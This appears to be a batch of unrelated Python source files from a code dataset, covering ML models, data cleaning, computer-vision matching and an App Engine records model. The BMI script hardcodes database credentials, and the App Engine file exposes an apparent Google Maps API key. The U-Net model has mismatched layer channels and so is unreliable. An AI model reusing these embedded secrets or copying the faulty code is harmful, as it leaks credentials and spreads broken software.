exist_ok=True)\n for md_df in md_dic:\n # Save the metadata in out_dir ./data/wavxk/mode/subset\n save_path_mixture = os.path.join(metadata_path, md_df + '.csv')\n md_dic[md_df].to_csv(save_path_mixture, index=False)\n\n\ndef resample_and_norm(signal, orig, target, lvl):\n\n if orig != target:\n signal = resample_poly(signal, target, orig)\n\n #fx = (AudioEffectsChain().custom(\"norm {}\".format(lvl)))\n #signal = fx(signal)\n\n meter = pyloudnorm.Meter(target, block_size=0.1)\n loudness = meter.integrated_loudness(signal)\n signal = pyloudnorm.normalize.loudness(signal, loudness, lvl)\n\n return signal\n\n\ndef create_empty_mixture_md(n_src, subdir):\n \"\"\" Create the mixture dataframe\"\"\"\n mixture_dataframe = pd.DataFrame()\n mixture_dataframe['mixture_ID'] = {}\n mixture_dataframe['mixture_path'] = {}\n if subdir == 'mix_clean':\n for i in range(n_src):\n mixture_dataframe[f\"source_{i + 1}_path\"] = {}\n elif subdir == 'mix_noisy':\n for i in range(n_src):\n mixture_dataframe[f\"source_{i + 1}_path\"] = {}\n mixture_dataframe[f\"noise_path\"] = {}\n elif subdir == 'mix_single':\n mixture_dataframe[\"source_1_path\"] = {}\n mixture_dataframe[f\"noise_path\"] = {}\n mixture_dataframe['length'] = {}\n return mixture_dataframe\n\n\ndef add_to_mixture_metadata(mix_df, mix_id, abs_mix_path, abs_sources_path,\n length, subdir, abs_noise_path=None):\n \"\"\" Add a new line to mixture_df \"\"\"\n sources_path = abs_sources_path\n if subdir == 'mix_clean':\n noise_path = []\n elif subdir == 'mix_single':\n sources_path = [abs_sources_path[0]]\n if abs_noise_path is not None:\n row_mixture = [mix_id, abs_mix_path] + sources_path + [abs_noise_path] + [length]\n else:\n row_mixture = [mix_id, abs_mix_path] + sources_path + [length]\n mix_df.loc[len(mix_df)] = row_mixture\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n main(args)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"scripts/make_mixtures.py","file_name":"make_mixtures.py","file_ext":"py","file_size_in_byte":7487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"242293189","text":"import bmi_Calculator\nimport pymysql\n\n\ndef db_Connection():\n try:\n # Database credential initialization\n endpoint = \"localhost\"\n username = \"root\"\n password = \"admin\"\n database_name = \"bmicalc\"\n\n # Connection to database\n connection = pymysql.connect(\n host=endpoint, user=username, passwd=password, db=database_name)\n cursor = connection.cursor()\n return cursor, connection\n except Exception as Identifier:\n print(Identifier)\n\n\ndef createtable():\n resp = {}\n try:\n\n cursor, connection = db_Connection()\n sqlCreateTable = \"\"\"CREATE TABLE IF NOT EXISTS bmi_data (\n BMI_DATA_ID int NOT NULL AUTO_INCREMENT,\n PERSON_GENDER varchar(50) NOT NULL,\n PERSON_HEIGHT varchar(50) NOT NULL,\n PERSON_WEIGHT varchar(50) NOT NULL,\n PERSON_BMI varchar(50) NOT NULL,\n PERSON_BMI_CATEGORY varchar(50) NOT NULL,\n PERSON_HEALTH_RISK varchar(50) NOT NULL,\n BMI_DATA_TS timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,\n PRIMARY KEY (BMI_DATA_ID)\n );\n \"\"\"\n cursor.execute(sqlCreateTable)\n connection.commit()\n resp[\"Msg\"] = \"Table Created Successfully\"\n return resp\n except pymysql.Error as sqlerror:\n resp[\"Msg\"] = \"Error in table Creation\"\n return resp\n\n\nif __name__ == \"__main__\":\n\n result = createtable()\n print(result)\n","sub_path":"create_table.py","file_name":"create_table.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"289246164","text":"# -*- coding: utf-8 -*\nimport torch\n\nfrom loguru import logger\nfrom videoanalyst.model.module_base import ModuleBase\nfrom videoanalyst.model.task_model.taskmodel_base import (TRACK_TASKMODELS,\n VOS_TASKMODELS)\nfrom videoanalyst.utils import md5sum\n\ntorch.set_printoptions(precision=8)\n\n\n@VOS_TASKMODELS.register\nclass SatVOS(ModuleBase):\n r\"\"\"\n State-Aware Tracker model for VOS\n\n Hyper-Parameters\n ----------------\n pretrain_model_path: string\n path to parameter to be loaded into module\n \"\"\"\n\n default_hyper_params = dict(pretrain_model_path=\"\", )\n\n def __init__(self, GML_extractor, joint_encoder, decoder, loss):\n super(SatVOS, self).__init__()\n self.GML_extractor = GML_extractor\n self.joint_encoder = joint_encoder\n self.decoder = decoder\n # loss\n self.loss = loss\n\n def forward(self, *args, phase=\"train\"):\n r\"\"\"\n Perform VOS process for different phases (e.g. train / global_feature / segment)\n\n Arguments\n ---------\n filterd_image: torch.Tensor\n filtered image patch for global modeling loop\n\n saliency_image: torch.Tensor\n saliency image for saliency encoder\n corr_feature: torch.Tensor\n correlated feature produced by siamese encoder\n global_feature: torch.Tensor\n global feature produced by global modeling loop\n\n Returns\n -------\n f_g: torch.Tensor\n global feature extracted from filtered image\n pred_mask: torch.Tensor\n predicted mask after sigmoid for the patch of saliency image\n\n \"\"\"\n # phase: train\n if phase == 'train':\n pass\n\n # phase: feature\n elif phase == 'global_feature':\n filterd_image, = args\n f_g = self.GML_extractor(filterd_image)\n out_list = [f_g]\n return out_list\n\n elif phase == 'segment':\n saliency_image, corr_feature, global_feature = args\n enc_features = self.joint_encoder(saliency_image, corr_feature)\n decoder_features = [global_feature] + enc_features\n\n outputs = self.decoder(decoder_features)\n pred_mask = outputs[0]\n out_list = [pred_mask]\n return out_list\n\n else:\n raise ValueError(\"Phase non-implemented.\")\n\n def update_params(self):\n r\"\"\"\n Load model parameters\n \"\"\"\n if self._hyper_params[\"pretrain_model_path\"] != \"\":\n model_path = self._hyper_params[\"pretrain_model_path\"]\n state_dict = torch.load(model_path,\n map_location=torch.device(\"cpu\"))\n if \"model_state_dict\" in state_dict:\n state_dict = state_dict[\"model_state_dict\"]\n try:\n self.load_state_dict(state_dict, strict=True)\n except:\n self.load_state_dict(state_dict, strict=False)\n logger.info(\"Pretrained weights loaded from {}\".format(model_path))\n logger.info(\"Check md5sum of Pretrained weights: %s\" %\n md5sum(model_path))\n\n def set_device(self, dev):\n if not isinstance(dev, torch.device):\n dev = torch.device(dev)\n self.to(dev)\n if self.loss is not None:\n for loss_name in self.loss:\n self.loss[loss_name].to(dev)\n","sub_path":"videoanalyst/model/task_model/taskmodel_impl/sat_vos.py","file_name":"sat_vos.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"94204907","text":"import data_cleansing as dc\nimport store_db\nimport numpy as np\nfrom datetime import datetime\n\n\nclass Applications:\n def __init__(self):\n self.filepath = './data/applications.csv'\n self.date = datetime(year=2019, month=3, day=12)\n self.dc = dc.DataPrep(self.filepath)\n self.df = self.load_data_frame()\n self.features = ['person_id', 'id', 'job_ad_id', 'submitted_at']\n\n def load_data_frame(self):\n if not self.dc.check_clean_file():\n self.prepare_clean_ds(self.dc)\n self.dc = dc.DataPrep(self.filepath)\n\n # Load the clean DS\n df = self.dc.df\n\n # Test the dataset for inconsistencies\n df = self.test_and_prep_df(df)\n\n return df.add_suffix('_appl')\n\n def prepare_clean_ds(self, dc):\n\n # Convert datetime columns to date format\n dc.convert_to_datetime('submitted_at')\n dc.convert_to_datetime('created_at')\n dc.df['submitted_at_wkd'] = dc.df['submitted_at'].dt.dayofweek\n dc.df['created_at_wkd'] = dc.df['created_at'].dt.dayofweek\n dc.df['application_time_days'] = (dc.df['submitted_at'] - dc.df['created_at']).dt.days\n dc.df['date_today'] = self.date\n dc.df['created_not_finished'] = np.where(((dc.df['date_today'] - dc.df['created_at'].dt.tz_localize(None)).dt.days == -1) & dc.df['submitted_at'].isnull(), -0.5, 0)\n dc.df['created_not_finished'] = dc.df['created_not_finished'].fillna(0)\n dc.df = dc.df.drop('date_today', axis=1)\n\n sqlite = store_db.SQLite()\n dc.df.to_sql('applications', con=sqlite.create_connection(), if_exists='replace', index=False)\n\n dc.generate_clean_csv()\n\n def test_and_prep_df(self, df):\n\n df = dc.DataPrep.remove_dup_rows(df, self.dc.name)\n\n # Test if the user applied to the same job offer more than once. The data is not clear, if when a user edits an application it is considered a new application or, the row is updated.\n # As stated, we are removing the 'duplicate lines', if any\n # Consider removing this line, as the conditions where the user re-applied might have changed (new skills)\n clean_df = df.dropna(subset=['submitted_at'])\n\n if clean_df.groupby(['person_id', 'job_ad_id', 'id'])['job_ad_id'].count().max() > 1:\n df.drop_duplicates(subset=['person_id', 'job_ad_id'])\n print(\"User applied more than once to the job offer\")\n\n if df.groupby(['person_id', 'id'])['job_ad_id'].count().max() > 1:\n print(\"User can have multiple IDs or User Ids\")\n\n return df\n","sub_path":"applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"403009152","text":"import argparse\n\n#パーサーのインスタンスを作成\nparser = argparse.ArgumentParser(description='Example command')\n\n#文字列を受け取る-sオプションを定義\nparser.add_argument('-s', '--string', type=str, help='string to display', required=True)\n\n#数値を受け取る-nオプションを定義\nparser.add_argument('-n','--num',type=int, help='number of times repeatedly display the string', default=2 )\n\n#引数をパースし、得られた値を変数に格納する\nargs = parser.parse_args()\n\n#パースによって得られた値を扱う\nprint(args.string * args.num) \n\n","sub_path":"scraping/selenium_kisyou_kako/repeat.py","file_name":"repeat.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"168869758","text":"# 1. Generating dataset from file\nimport os\n'''\nExpected dataset example:\n{\n 'Jane': { \n '10.11.2018': { \n 'apple': {\n 'quantity':1,\n 'price': 4.5\n } #, ...\n } #,...\n } #,...\n}\n'''\n# Method 1. Column-wise read\n'''\nTemorary dataset example: {'Jane': [['10.11.2018', 'apple', '1', '4.5']] }\n'''\ndef convert_2_dict(lst):\n '''\n Args:\n lst (list): list of lists for a curent column sub-dictionary\n '''\n if len(lst[0]) == 2:\n return {\n 'quantity': lst[0][0],\n 'price': lst[0][1]\n }\n dct = {}\n for sublst in lst:\n key = sublst[0]\n if key not in dct:\n dct[key] = []\n dct[key].append(sublst[1:])\n for key in dct:\n dct[key] = convert_2_dict(dct[key])\n return dct\nfile = os.path.join(\"../data/task1.csv\")\nwith open(file, encoding='utf-8') as f:\n f.readline()\n file = [[el.strip() for el in line.split(',')] for line in f]\n result = convert_2_dict(file)\n\nprint(result)\n\n\n# Method 2. Row-wise read\ndef add_to_dict(dct, lst):\n '''\n Args:\n dct (dict): (sub)dictionary that is currently updated\n lst (list): list of items in a currently processed row\n '''\n if len(lst) == 3:\n dct[lst[0]] = {\n 'quantity': lst[1],\n 'price': lst[2]\n }\n return dct\n key = lst[0]\n if key not in dct:\n dct[key] = {}\n add_to_dict(dct[key], lst[1:])\n return dct\n\ndef convert_str(s):\n return list(map(str.strip, s.split(',')))\n\nfrom functools import reduce\nfile = os.path.join(\"../data/task1.csv\")\nwith open(file, encoding='utf-8') as f:\n f.readline()\n result = reduce(add_to_dict, map(convert_str, f), {})\n\nprint(result)\n\n\n# 2. Extracting data from dataset\nres = set()\n\nfor name, val in result.items():\n for date, val2 in val.items():\n res = res.union(set(val2.keys()))\nfor name in result:\n client_products = set()\n for date in result[name]:\n client_products = client_products.union(set(result[name][date].keys()))\n res = res.intersection(client_products)\n\nprint(res)\n\n\n# 3. Extracting and plotting data series \napples = {}\n\nfor _, dates in result.items():\n for date, products in dates.items():\n for prod, chars in products.items():\n if prod == 'apple':\n apples[date] = chars['price']\n# this can also be written as\n# apples = { \n# date: chars['price'] \n# for _, dates in result.items()\n# for date, products in dates.items()\n# for prod, chars in products.items()\n# if prod == 'apple'\n# }\n\nprint(apples)\n\nimport plotly.offline as pl\nimport plotly.graph_objs as go\n\nxs = sorted(list(apples.keys()))\nys = [apples[key] for key in xs]\n\npl.plot([go.Scatter(x=xs,y=ys)])\n# same as\n#\n# pl.plot({\n# 'data': [go.Scatter(x=xs,y=ys)]\n# })\n#\n# or even\n#\n# series1 = go.Scatter(x=xs,y=ys)\n# options = {\n# 'data': [series1]\n# }\n# pl.plot(options)\n","sub_path":"Dataset_tasks/dataset_example.py","file_name":"dataset_example.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"515019920","text":"import torch \nimport torch.nn as nn\n\nimport CONST\n\n\n#double 3x3 convolution \ndef dual_conv(in_channel, out_channel):\n conv = nn.Sequential(\n nn.Conv2d(in_channel, out_channel, kernel_size=3, padding=(1, 1)),\n nn.ReLU(inplace= True),\n nn.Conv2d(out_channel, out_channel, kernel_size=3, padding=(1, 1)),\n nn.ReLU(inplace= True),\n )\n return conv\n\n\nclass Unet(nn.Module):\n def __init__(self):\n super(Unet, self).__init__()\n\n # Left side (contracting path)\n self.dwn_conv1 = dual_conv(3, 64)\n self.dwn_conv2 = dual_conv(64, 128)\n self.dwn_conv3 = dual_conv(128, 256)\n self.dwn_conv4 = dual_conv(256, 512)\n self.dwn_conv5 = dual_conv(512, 1024)\n self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2, padding=(0, 0))\n\n #Right side (expnsion path) \n #transpose convolution is used showna as green arrow in architecture image\n self.trans1 = nn.ConvTranspose2d(1024, 512, kernel_size=2, stride=2, padding=(0, 0))\n self.up_conv1 = dual_conv(1024, 512)\n self.trans2 = nn.ConvTranspose2d(512, 256, kernel_size=2, stride=2, padding=(0, 0))\n self.up_conv2 = dual_conv(512, 256)\n self.trans3 = nn.ConvTranspose2d(256, 128, kernel_size=2, stride=2, padding=(0, 0))\n self.up_conv3 = dual_conv(256, 128)\n self.trans4 = nn.ConvTranspose2d(128, 64, kernel_size=2, stride=2, padding=(0, 0))\n self.up_conv4 = dual_conv(128, 64)\n\n #output layer\n self.out = nn.Conv2d(64, 2, kernel_size=1)\n\n #output layer\n self.out = nn.Conv2d(32, 2, kernel_size=1)\n \n def forward(self, image):\n\n #forward pass for Left side\n x1 = self.dwn_conv1(image)\n x2 = self.maxpool(x1)\n x3 = self.dwn_conv2(x2)\n x4 = self.maxpool(x3)\n x5 = self.dwn_conv3(x4)\n x6 = self.maxpool(x5)\n x7 = self.dwn_conv4(x6)\n x8 = self.maxpool(x7)\n x9 = self.dwn_conv5(x8)\n\n #forward pass for Right side\n x = self.trans1(x9)\n y = x7\n x = self.up_conv1(torch.cat([x,y], 1))\n\n x = self.trans2(x)\n y = x5\n x = self.up_conv2(torch.cat([x,y], 1))\n\n x = self.trans3(x)\n y = x3\n x = self.up_conv3(torch.cat([x,y], 1))\n\n x = self.trans4(x)\n y = x1\n x = self.up_conv4(torch.cat([x,y], 1))\n \n x = self.out(x)\n \n return x\n\n\nif __name__ == '__main__':\n image = torch.rand((1, 1, CONST.HEIGHT, CONST.WIDTH))\n model = Unet()\n model_output = model(image)\n \n print(model_output.shape)\n\n assert all([list(model_output.shape) == [1, 2, CONST.HEIGHT, CONST.WIDTH]])","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"399030387","text":"def palindrome(num_list):\n revers_list = []\n for i_num in range(len(num_list) - 1, -1, -1):\n revers_list.append(num_list[i_num])\n if num_list == revers_list:\n return True\n else:\n return False\n\n\nnums = int(input('Кол-во чисел: '))\nall_num = []\nnew_num = []\nanswer = []\n\nfor _ in range(nums):\n num = int(input('Число: '))\n all_num.append(num)\n\nfor i_nums in range(0, len(all_num)):\n for j_num in range(i_nums, len(all_num)):\n new_num.append(all_num[j_num])\n if palindrome(new_num):\n for i_answer in range(0, i_nums):\n answer.append(all_num[i_answer])\n answer.reverse()\n break\n new_num = []\n\nprint('Последовательность: ', all_num)\nprint('Нужно приписать чисел: ', len(answer))\nprint('Сами числа: ', answer)\n","sub_path":"Module16/10_simmetrical_seq/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"405786134","text":"import numpy as np\n\n\nclass MatrixManipulation:\n def __init__(self, type):\n self.type = type\n\n def type_matrix(self, values):\n if self.type == \"LOWER_DIAG_ROW\":\n return self.fill_matrix_lower(values)\n elif self.type == \"UPPER_DIAG_ROW\":\n return self.fill_matrix(values)\n else:\n print(\"Not Support this type\")\n\n def fill_matrix(self, values):\n elements = self.return_elements(values)\n matrix = np.zeros((elements, elements))\n iu1 = np.triu_indices(elements, 1)\n matrix[iu1] = values\n iu2 = np.tril_indices(elements, -1)\n matrix[iu2] = values\n\n return matrix\n\n def fill_matrix_lower(self, values):\n elements = self.return_elements(values) - 1\n matrix = np.zeros((elements, elements))\n iu1 = np.triu_indices(elements)\n matrix[iu1] = values\n iu2 = np.tril_indices(elements)\n matrix[iu2] = values\n\n return matrix\n\n def return_elements(self, values: list) -> int:\n size = len(values)\n i = 1\n total = 0\n while total < size:\n total += i\n i += 1\n\n return i\n","sub_path":"utils/Matrix_Manipulation.py","file_name":"Matrix_Manipulation.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"566578182","text":"import platform\r\nimport datetime\r\nimport os\r\n\r\n\"\"\"\r\nThe Logger class will create a log file if it does not\r\nalready exist. The log file provides timestamps for\r\nwhen a file is parsed by the main program.\r\n\r\n@authors: Tomas Perez, Lauren Nelson, Roberto Rodriguez \r\n\"\"\"\r\n\r\n\r\nclass Logger:\r\n def __init__(self, logfile):\r\n self.logfile = logfile\r\n # Verify that the log file is not a directory.\r\n if os.path.isdir(logfile):\r\n raise Exception(\"The path for the log file must be a file, not a directory.\")\r\n # Verify directory exists (note file not needed)\r\n folder = os.path.dirname(logfile)\r\n if not os.path.dirname(folder):\r\n raise Exception(\"The folder for the log file does not exist.\")\r\n\r\n def log(self, msg):\r\n machine = platform.node()\r\n now = datetime.datetime.now()\r\n date = \"{0}_{1}_{2} {3}:{4}:{5}\".format(\r\n now.year, now.month, now.day,\r\n now.hour, now.minute, now.second)\r\n text = \"{0}/{1}: {2}\".format(machine, date, msg)\r\n print(\" log=\" + text)\r\n # Append line to log file\r\n with open(self.logfile, 'a+') as file_out:\r\n file_out.write(\"{0}\\n\".format(text))\r\n","sub_path":"EGR-400-Project1_Personal/FileAPI/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"318855425","text":"import os\nimport json\n\n\ntaxonomy_file = 'taxonomy/ott3.2/taxonomy.tsv'\n\nis_header = True\ngenus = set()\n\nwith open(taxonomy_file, 'r') as f:\n for row in f:\n row = row.strip()\n items = [s.strip() for s in row.split('|')]\n if is_header:\n columns = items\n is_header = False\n else:\n d = dict(zip(columns, items))\n if d['rank'] == 'genus':\n genus.add(d['name'])\n\nmimicry_files = sorted([s for s in os.listdir('mimicry') if s.endswith('.json')])\n\nfor mf in mimicry_files:\n path = os.path.join('mimicry', mf)\n \n print(path)\n\n with open(path, 'r') as f:\n data = json.loads(f.read())\n \n if not data['mimetic']['genus'] in genus:\n print('mimetic genus not found:', data['mimetic']['genus'])\n \n for model in data['model']:\n if not model['genus'] in genus:\n print('model genus not found:', model['genus'])\n","sub_path":"1_check_mimicry.py","file_name":"1_check_mimicry.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"101497778","text":"from django.shortcuts import render, get_object_or_404\n\nfrom .models import Producto, Categoria\nfrom ecomerce.cart.forms import CartAddProductForm\n# Create your views here.\n\ndef producto_lista(request, category_slug=None):\n categoria = None\n categorias = Categoria.objects.all()\n productos = Producto.objects.filter(disponible=True)\n if category_slug:\n categoria = get_object_or_404(Categoria, slug=category_slug)\n productos = productos.filter(categoria=categoria)\n return render(request,\n 'shop/producto/list.html',\n { 'categoria':categoria,\n 'categorias':categorias,\n 'productos':productos\n\n })\n\ndef producto_detalle(request, id, slug):\n producto = get_object_or_404(Producto,\n id=id,\n slug=slug,\n disponible=True)\n cart_product_form = CartAddProductForm()\n return render(request, 'shop/producto/detalle.html', {'producto':producto,\n 'cart_product_form':cart_product_form})","sub_path":"ecomerce/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136948497","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef correspondence_problem(factor):\n img1 = cv2.imread('book.jpg',cv2.IMREAD_GRAYSCALE)\n img2 = cv2.imread('image2.jpeg',cv2.IMREAD_GRAYSCALE)\n\n ## resize\n img1 = cv2.resize(img1, dsize=(480, 640), interpolation=cv2.INTER_AREA)\n img2 = cv2.resize(img2, dsize=(480, 640), interpolation=cv2.INTER_AREA)\n\n\n # sift 선언\n sift = cv2.xfeatures2d.SIFT_create()\n\n # SIFT 검출\n kp1 = sift.detect(img1, None)\n kp2 = sift.detect(img2, None)\n\n # SIFT 기술\n kp1, des1 = sift.compute(img1, kp1)\n kp2, des2 = sift.compute(img2, kp2)\n\n\n # FLANN 매칭\n FlANN_INDEX_KDTREE = 0\n index_params = dict(algorithm=FlANN_INDEX_KDTREE, trees=5)\n search_params = dict(checks=50)\n\n flann = cv2.FlannBasedMatcher(index_params, search_params)\n matches = flann.knnMatch(des1, des2, k=2)\n\n res = None\n good = []\n for m, n in matches:\n if m.distance < factor * n.distance:\n good.append(m)\n res = cv2.drawMatches(img1, kp1, img2, kp2, good, res, flags=2)\n\n # 이미지 출력\n img1_2, img2_2 = None, None\n img1_2 = cv2.drawKeypoints(img1, kp1, img1_2)\n img2_2 = cv2.drawKeypoints(img2, kp2, img2_2,\n flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n #\n # cv2.imshow('SIFT1 detect', img1_2)\n # cv2.imshow('SIFT2 detect', img2_2)\n # cv2.imshow('Feature Matching', res)\n\n\n # homography to find objects\n MIN_MATCH_COUNT = 30\n print(len(good))\n if len(good) > MIN_MATCH_COUNT:\n src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n # We have seen that there can be some possible errors while matching which may affect the result.\n # To solve this problem, algorithm uses RANSAC or LEAST_MEDIAN (which can be decided by the flags)\n matchesMask = mask.ravel().tolist()\n # ravel(): return a contiguous flattened array, tolist(): transfer tensor to list.\n\n h, w = img1.shape[:2]\n pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1, 1, 2)\n dst = cv2.perspectiveTransform(pts, M)\n dst +=np.float32([w,0])\n dst = cv2.polylines(dst, [np.int32(dst)], True, 255, 2, cv2.LINE_AA)\n # 그릴 대상 이미지, pts[i]위치 배열의 포인트 수,마지막과 처음 포인트 연결\n else:\n print(\"not enough matches\", len(good))\n matchesMask = None\n\n\n draw_params = dict(matchColor=(0, 255, 0),\n singlePointColor=(255, 0, 0),\n matchesMask=matchesMask, flags=0)\n # img4 = cv2.drawMatches(img1, kp1, img2, kp2, good, None, **draw_params)\n\n # Draw bounding box in Red\n img4 = cv2.polylines(res, [np.int32(dst)], True, (255, 0, 0), 2, cv2.LINE_AA)\n cv2.imshow('drawMatches',img4)\n\n cv2.waitKey(0)\n cv2.destroyAllwindows()\n\ncorrespondence_problem(0.8)\n","sub_path":"1주차코드/이동훈/1주차실습_이동훈.py","file_name":"1주차실습_이동훈.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346934592","text":"#!/usr/bin/env python\n#\n# Copyright 2018 Paul Harwood\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime, urllib, json\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext.ndb import msgprop\nfrom protorpc import messages\nfrom google.appengine.api import users\nfrom google.appengine.api import app_identity\nfrom google.appengine.api import urlfetch\nfrom datetime import datetime\nimport logging\nimport googlemaps\nfrom requests_toolbelt.adapters import appengine\nappengine.monkeypatch()\n\n\nGUN_TYPES = (\"Cast Iron\", \"Wrought Iron\", \"Bronze\", \"Not Known\")\n\nRECORD_QUALITIES = ('bronze', \"silver\", \"gold\")\n\nclass BNG(ndb.Model):\n eastings = ndb.IntegerProperty()\n northings = ndb.IntegerProperty()\n\n def convert_to_LL(self):\n url = 'http://www.bgs.ac.uk/data/webservices/CoordConvert_LL_BNG.cfc?method=BNGtoLatLng&easting=' + str(self.eastings) + \"&northing=\" + str(self.northings)\n return self.BGS_api(url)\n\n @classmethod\n def convert_from_LL(self, lat, lon):\n url = \"http://www.bgs.ac.uk/data/webservices/CoordConvert_LL_BNG.cfc?method=LatLongToBNG&lat=\" + lat + \"&lon=\" + lon\n return BNG.BGS_api(url)\n\n @classmethod\n def BGS_api(self,url):\n try:\n result = urlfetch.fetch(\n url= url,\n method='GET',\n headers={\"content-type\": \"application/json\"},\n deadline=2000)\n if result.status_code == 200:\n try:\n payload = result.content\n response = json.loads(payload)\n return response\n except:\n raise Exception('ParseError' + payload)\n else:\n raise Exception('ApiError' + str(result.status_code))\n except Exception as e:\n logging.error(str(e))\n return\n\n\nclass Gun(ndb.Model):\n class Types(messages.Enum):\n CAST = 0\n WROUGHT = 1\n BRONZE = 2\n NOT_KNOWN = 3\n class Quality(messages.Enum):\n GOLD = 2\n SILVER = 1\n BRONZE = 0\n id = ndb.IntegerProperty()\n gunid = ndb.IntegerProperty()\n location = ndb.GeoPtProperty()\n type = ndb.msgprop.EnumProperty(Types)\n quality = ndb.msgprop.EnumProperty(Quality, default=Quality.BRONZE)\n description = ndb.StringProperty()\n name = ndb.StringProperty()\n date = ndb.DateProperty(auto_now = True)\n site = ndb.StringProperty()\n context = ndb.StringProperty()\n collection = ndb.BooleanProperty()\n coll_name = ndb.StringProperty()\n coll_ref = ndb.StringProperty()\n images = ndb.TextProperty(repeated=True)\n markings = ndb.BooleanProperty()\n mark_details = ndb.StringProperty()\n interpretation = ndb.BooleanProperty()\n inter_details = ndb.StringProperty()\n country = ndb.StringProperty(default=\"none\")\n geocode = ndb.JsonProperty()\n\n @classmethod\n def map_data(cls):\n list = cls.query().order(Gun.id).fetch()\n map_data = []\n for gun in list :\n if gun.quality is None:\n gun.quality = Gun.Quality.BRONZE\n\n if gun.images[0] == \"\":\n thumbnail = \"/img/32x32.png\"\n else:\n thumbnail = gun.images[0] + \"=s32\"\n try:\n map_data.append({\n \"anchor_id\" : gun.id,\n \"description\" : gun.description,\n \"latitude\" : gun.location.lat,\n \"longitude\" : gun.location.lon,\n \"anchor_type\" : GUN_TYPES[gun.type.number],\n \"location\" : gun.context,\n \"names\" : gun.name,\n 'filename' : thumbnail,\n 'quality' : RECORD_QUALITIES[gun.quality.number],\n 'nationality': gun.country,\n 'site' : gun.site,\n })\n except Exception as e:\n logging.error(str(e))\n return map_data\n\n @classmethod\n def get_next(cls):\n all = Gun.query().order(-Gun.id).fetch()\n if all :\n return all[0].id + 1\n else:\n return 1\n\n @classmethod\n def get_id(self, id):\n return Gun.query(Gun.id == id).get()\n\ndef to_bool(bool_str):\n \"\"\"Parse the string and return the boolean value encoded or raise an exception\"\"\"\n if isinstance(bool_str, basestring) and bool_str:\n if bool_str.lower() in ['true', 't', '1', 'on']: return True\n elif bool_str.lower() in ['false', 'f', '0', 'off']: return False\n else: raise TypeError\n\ndef to_int(int_string):\n try:\n return int(int_string)\n except Exception :\n return 0\n\ndef UserStatus(uri):\n # set up the user context and links for the navbar\n user = users.get_current_user()\n uri = uri.split(\"?\")[0]\n if user:\n url = users.create_logout_url(uri)\n url_linktext = 'Logout'\n else:\n url = users.create_login_url(uri)\n url_linktext = 'Login'\n return {'user': user, 'url': url, 'url_linktext': url_linktext}\n\nclass Auth:\n def __init__(self, scope):\n self.scope = scope\n self.service_name = app_identity.get_application_id()\n return\n\n def get_token(self):\n self.auth_token, _ = app_identity.get_access_token(\n self.scope)\n logging.info(\n 'Using token {} to represent identity {}'.format(\n self.auth_token, app_identity.get_service_account_name()))\n return self.auth_token\n\n def get_signed_url(self, content_name, content_type):\n now = datetime.utcnow()\n delta = datetime.timedelta(hours=3)\n expiry = now + delta\n timestamp = expiry.timestamp()\n signed_string= \"PUT \\n \\n\" + content_type + \"\\n\" + str(timestamp) + \"\\n\" + \"/\" + self.service_name + \"/\" + content_name\n\n def get_url(self):\n return \"https://www.googleapis.com/upload/storage/v1/b/\" + self.service_name + \".appspot.com/o?uploadType=resumable\"\n\n\ndef geolocate(location) :\n gmaps = googlemaps.Client(key='AIzaSyDZcNCn8CzpdFG58rzRxQBORIWPN9LOVYg')\n reverse_geocode_result = gmaps.reverse_geocode((location.lat, location.lon))\n return 